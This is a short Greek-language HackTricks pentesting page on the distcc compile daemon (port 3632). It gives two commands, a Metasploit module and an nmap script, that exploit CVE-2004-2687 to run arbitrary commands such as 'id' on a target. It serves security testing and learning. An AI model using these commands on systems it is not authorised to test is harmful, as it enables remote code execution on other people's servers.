tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

Βασικές Πληροφορίες

Distcc είναι ένα εργαλείο που βελτιώνει τη διαδικασία μεταγλώττισης χρησιμοποιώντας τη μη χρησιμοποιούμενη επεξεργαστική ισχύ άλλων υπολογιστών στο δίκτυο. Όταν το distcc είναι ρυθμισμένο σε μια μηχανή, αυτή η μηχανή είναι ικανή να διανέμει τις εργασίες μεταγλώττισης σε ένα άλλο σύστημα. Αυτό το σύστημα παραλήπτης πρέπει να εκτελεί τον distccd daemon και να έχει εγκατεστημένο έναν συμβατό μεταγλωττιστή για να επεξεργαστεί τον αποσταλμένο κώδικα.

Προεπιλεγμένη θύρα: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Εκμετάλλευση

Ελέγξτε αν είναι ευάλωτο στο CVE-2004-2687 για να εκτελέσετε αυθαίρετο κώδικα:

bash
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

Δεν νομίζω ότι το shodan ανιχνεύει αυτή την υπηρεσία.

Resources

Post created by Álex B (@r1p)

tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks